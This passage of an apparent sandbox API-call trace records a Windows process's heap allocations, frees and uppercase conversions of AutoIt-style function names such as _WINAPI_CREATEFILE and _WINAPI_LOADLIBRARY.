Flags=0x0, Size=0x10) returned 0x435bb10 [0073.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17d0258 [0073.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x17970e8 [0073.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc4) returned 0x18523c0 [0073.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435bb70 [0073.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0308 [0073.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435b918 [0073.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0368 [0073.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435bb88 [0073.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0378 [0073.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435ba68 [0073.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0248 [0073.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435b948 [0073.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0298 [0073.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435b978 [0073.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d03b8 [0073.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bb70 | out: hHeap=0x1780000) returned 1 [0073.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17bc1b0 [0073.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435b918 | out: hHeap=0x1780000) returned 1 [0073.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f4ca0 [0073.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bb88 | out: hHeap=0x1780000) returned 1 [0073.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f4ed0 [0073.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435ba68 | out: hHeap=0x1780000) returned 1 [0073.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f4cf0 [0073.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435b948 | out: hHeap=0x1780000) returned 1 [0073.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f4d18 [0073.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435b978 | out: hHeap=0x1780000) returned 1 [0073.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f4d68 [0073.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0258 | out: hHeap=0x1780000) returned 1 [0073.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435ba08 [0073.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17d0268 [0073.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0268 | out: hHeap=0x1780000) returned 1 [0073.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17f4d68 | out: hHeap=0x1780000) returned 1 [0073.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d03b8 | out: hHeap=0x1780000) returned 1 [0073.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17f4d18 | out: hHeap=0x1780000) returned 1 [0073.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0298 | out: hHeap=0x1780000) returned 1 [0073.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17f4cf0 | out: hHeap=0x1780000) returned 1 [0073.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0248 | out: hHeap=0x1780000) returned 1 [0073.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17f4ed0 | out: hHeap=0x1780000) returned 1 [0073.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0378 | out: hHeap=0x1780000) returned 1 [0073.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17f4ca0 | out: hHeap=0x1780000) returned 1 [0073.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0368 | out: hHeap=0x1780000) returned 1 [0073.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17bc1b0 | out: hHeap=0x1780000) returned 1 [0073.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0308 | out: hHeap=0x1780000) returned 1 [0073.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x18523c0 | out: hHeap=0x1780000) returned 1 [0073.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17970e8 | out: hHeap=0x1780000) returned 1 [0073.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bb10 | out: hHeap=0x1780000) returned 1 [0073.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435ba08 | out: hHeap=0x1780000) returned 1 [0073.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17f4e80 | out: hHeap=0x1780000) returned 1 [0073.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d03a8 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bb58 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435b930 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17f5088 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d01c8 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d5df8 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bbd0 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17f4fc0 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0238 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17f4f98 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0358 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17f4f70 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d02e8 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17f4f48 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0228 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17f4f20 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d01f8 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17bc760 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0338 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17fb3e0 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f88 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435b8e8 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0208 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17fb728 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0328 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bb40 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435b9d8 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0188 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17f4cc8 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bb28 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0398 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435b960 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0318 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17f4d40 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d02a8 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17f4c50 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0348 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17f4c28 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0388 | out: hHeap=0x1780000) returned 1 [0073.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17f50d8 | out: hHeap=0x1780000) returned 1 [0073.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17cfff8 | out: hHeap=0x1780000) returned 1 [0073.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17f50b0 | out: hHeap=0x1780000) returned 1 [0073.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17cffe8 | out: hHeap=0x1780000) returned 1 [0073.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17bc300 | out: hHeap=0x1780000) returned 1 [0073.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17cffd8 | out: hHeap=0x1780000) returned 1 [0073.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17fb4f8 | out: hHeap=0x1780000) returned 1 [0073.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d02f8 | out: hHeap=0x1780000) returned 1 [0073.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17fb608 | out: hHeap=0x1780000) returned 1 [0073.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f68 | out: hHeap=0x1780000) returned 1 [0073.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435ba98 | out: hHeap=0x1780000) returned 1 [0073.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435baf8 | out: hHeap=0x1780000) returned 1 [0073.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0128 | out: hHeap=0x1780000) returned 1 [0073.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17f4e58 | out: hHeap=0x1780000) returned 1 [0073.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bae0 | out: hHeap=0x1780000) returned 1 [0073.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0108 | out: hHeap=0x1780000) returned 1 [0073.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0108 [0073.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17bc3a8 [0073.208] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0073.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17bc3a8 | out: hHeap=0x1780000) returned 1 [0073.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0108 | out: hHeap=0x1780000) returned 1 [0073.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0108 [0073.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17bc5a0 [0073.208] CharUpperBuffW (in: lpsz="_WINAPI_FREELIBRARY", cchLength=0x13 | out: lpsz="_WINAPI_FREELIBRARY") returned 0x13 [0073.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17bc5a0 | out: hHeap=0x1780000) returned 1 [0073.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0108 | out: hHeap=0x1780000) returned 1 [0073.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0128 [0073.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17bc5a0 [0073.208] CharUpperBuffW (in: lpsz="_WINAPI_GETCURSORINFO", cchLength=0x15 | out: lpsz="_WINAPI_GETCURSORINFO") returned 0x15 [0073.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17bc5a0 | out: hHeap=0x1780000) returned 1 [0073.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0128 | out: hHeap=0x1780000) returned 1 [0073.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17cfff8 [0073.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17bc418 [0073.208] CharUpperBuffW (in: lpsz="_WINAPI_GETDLGCTRLID", cchLength=0x14 | out: lpsz="_WINAPI_GETDLGCTRLID") returned 0x14 [0073.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17bc418 | out: hHeap=0x1780000) returned 1 [0073.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17cfff8 | out: hHeap=0x1780000) returned 1 [0073.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0128 [0073.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17bc300 [0073.209] CharUpperBuffW (in: lpsz="_WINAPI_GETMODULEHANDLE", cchLength=0x17 | out: lpsz="_WINAPI_GETMODULEHANDLE") returned 0x17 [0073.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17bc300 | out: hHeap=0x1780000) returned 1 [0073.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0128 | out: hHeap=0x1780000) returned 1 [0073.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0108 [0073.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17bc370 [0073.209] CharUpperBuffW (in: lpsz="_WINAPI_GETSTRING", cchLength=0x11 | out: lpsz="_WINAPI_GETSTRING") returned 0x11 [0073.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17bc370 | out: hHeap=0x1780000) returned 1 [0073.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0108 | out: hHeap=0x1780000) returned 1 [0073.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0108 [0073.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17bc680 [0073.209] CharUpperBuffW (in: lpsz="_WINAPI_ISWOW64PROCESS", cchLength=0x16 | out: lpsz="_WINAPI_ISWOW64PROCESS") returned 0x16 [0073.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17bc680 | out: hHeap=0x1780000) returned 1 [0073.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0108 | out: hHeap=0x1780000) returned 1 [0073.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0108 [0073.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17bc728 [0073.209] CharUpperBuffW (in: lpsz="_WINAPI_LOADIMAGE", cchLength=0x11 | out: lpsz="_WINAPI_LOADIMAGE") returned 0x11 [0073.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17bc728 | out: hHeap=0x1780000) returned 1 [0073.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0108 | out: hHeap=0x1780000) returned 1 [0073.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0108 [0073.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17bc4c0 [0073.209] CharUpperBuffW (in: lpsz="_WINAPI_LOADLIBRARY", cchLength=0x13 | out: lpsz="_WINAPI_LOADLIBRARY") returned 0x13 [0073.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17bc4c0 | out: hHeap=0x1780000) returned 1 [0073.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0108 | out: hHeap=0x1780000) returned 1 [0073.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0108 [0073.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17bc418 [0073.209] CharUpperBuffW (in: lpsz="_WINAPI_PATHISDIRECTORY", cchLength=0x17 | out: lpsz="_WINAPI_PATHISDIRECTORY") returned 0x17 [0073.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17bc418 | out: hHeap=0x1780000) returned 1 [0073.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0108 | out: hHeap=0x1780000) returned 1 [0073.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0188 [0073.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17bc290 [0073.210] CharUpperBuffW (in: lpsz="_WINAPI_READFILE", cchLength=0x10 | out: lpsz="_WINAPI_READFILE") returned 0x10 [0073.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17bc290 | out: hHeap=0x1780000) returned 1 [0073.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0188 | out: hHeap=0x1780000) returned 1 [0073.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0128 [0073.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f4d68 [0073.210] CharUpperBuffW (in: lpsz="_WINAPI_STRLEN", cchLength=0xe | out: lpsz="_WINAPI_STRLEN") returned 0xe [0073.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17f4d68 | out: hHeap=0x1780000) returned 1 [0073.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0128 | out: hHeap=0x1780000) returned 1 [0073.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0108 [0073.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17bc530 [0073.210] CharUpperBuffW (in: lpsz="_WINAPI_SWITCHCOLOR", cchLength=0x13 | out: lpsz="_WINAPI_SWITCHCOLOR") returned 0x13 [0073.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17bc530 | out: hHeap=0x1780000) returned 1 [0073.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0108 | out: hHeap=0x1780000) returned 1 [0073.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0188 [0073.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17bc1b0 [0073.210] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0073.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17bc1b0 | out: hHeap=0x1780000) returned 1 [0073.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0188 | out: hHeap=0x1780000) returned 1 [0073.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0188 [0073.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17bc300 [0073.210] CharUpperBuffW (in: lpsz="__CHECKERRORARRAYBOUNDS", cchLength=0x17 | out: lpsz="__CHECKERRORARRAYBOUNDS") returned 0x17 [0073.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17bc300 | out: hHeap=0x1780000) returned 1 [0073.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0188 | out: hHeap=0x1780000) returned 1 [0073.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0108 [0073.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17bc220 [0073.210] CharUpperBuffW (in: lpsz="__CHECKERRORCLOSEHANDLE", cchLength=0x17 | out: lpsz="__CHECKERRORCLOSEHANDLE") returned 0x17 [0073.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17bc220 | out: hHeap=0x1780000) returned 1 [0073.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0108 | out: hHeap=0x1780000) returned 1 [0073.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0128 [0073.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435bb28 [0073.211] CharUpperBuffW (in: lpsz="__DLL", cchLength=0x5 | out: lpsz="__DLL") returned 0x5 [0073.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bb28 | out: hHeap=0x1780000) returned 1 [0073.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0128 | out: hHeap=0x1780000) returned 1 [0073.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d01c8 [0073.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17bc6b8 [0073.211] CharUpperBuffW (in: lpsz="__ENUMWINDOWSPROC", cchLength=0x11 | out: lpsz="__ENUMWINDOWSPROC") returned 0x11 [0073.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17bc6b8 | out: hHeap=0x1780000) returned 1 [0073.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d01c8 | out: hHeap=0x1780000) returned 1 [0073.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0108 [0073.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f4ed0 [0073.211] CharUpperBuffW (in: lpsz="__FATALEXIT", cchLength=0xb | out: lpsz="__FATALEXIT") returned 0xb [0073.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17f4ed0 | out: hHeap=0x1780000) returned 1 [0073.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0108 | out: hHeap=0x1780000) returned 1 [0073.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0188 [0073.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435bb58 [0073.211] CharUpperBuffW (in: lpsz="__INC", cchLength=0x5 | out: lpsz="__INC") returned 0x5 [0073.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bb58 | out: hHeap=0x1780000) returned 1 [0073.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0188 | out: hHeap=0x1780000) returned 1 [0073.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d01c8 [0073.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435baf8 [0073.211] CharUpperBuffW (in: lpsz="__RGB", cchLength=0x5 | out: lpsz="__RGB") returned 0x5 [0073.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435baf8 | out: hHeap=0x1780000) returned 1 [0073.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d01c8 | out: hHeap=0x1780000) returned 1 [0073.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d01c8 [0073.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f5088 [0073.211] CharUpperBuffW (in: lpsz="__WINVER", cchLength=0x8 | out: lpsz="__WINVER") returned 0x8 [0073.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17f5088 | out: hHeap=0x1780000) returned 1 [0073.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d01c8 | out: hHeap=0x1780000) returned 1 [0073.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f4fc0 [0073.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435baf8 [0073.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0188 [0073.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435baf8 | out: hHeap=0x1780000) returned 1 [0073.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17bc418 [0073.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435b9a8 [0073.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435bbb8 [0073.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17d01c8 [0073.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bbb8 | out: hHeap=0x1780000) returned 1 [0073.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435bb70 [0073.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d01c8 | out: hHeap=0x1780000) returned 1 [0073.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d01c8 [0073.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17bc2c8 [0073.212] CharUpperBuffW (in: lpsz="_WINAPI_CLSIDFROMPROGID", cchLength=0x17 | out: lpsz="_WINAPI_CLSIDFROMPROGID") returned 0x17 [0073.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17bc2c8 | out: hHeap=0x1780000) returned 1 [0073.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d01c8 | out: hHeap=0x1780000) returned 1 [0073.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0108 [0073.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17bc530 [0073.212] CharUpperBuffW (in: lpsz="_WINAPI_COINITIALIZE", cchLength=0x14 | out: lpsz="_WINAPI_COINITIALIZE") returned 0x14 [0073.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17bc530 | out: hHeap=0x1780000) returned 1 [0073.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0108 | out: hHeap=0x1780000) returned 1 [0073.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0108 [0073.212] 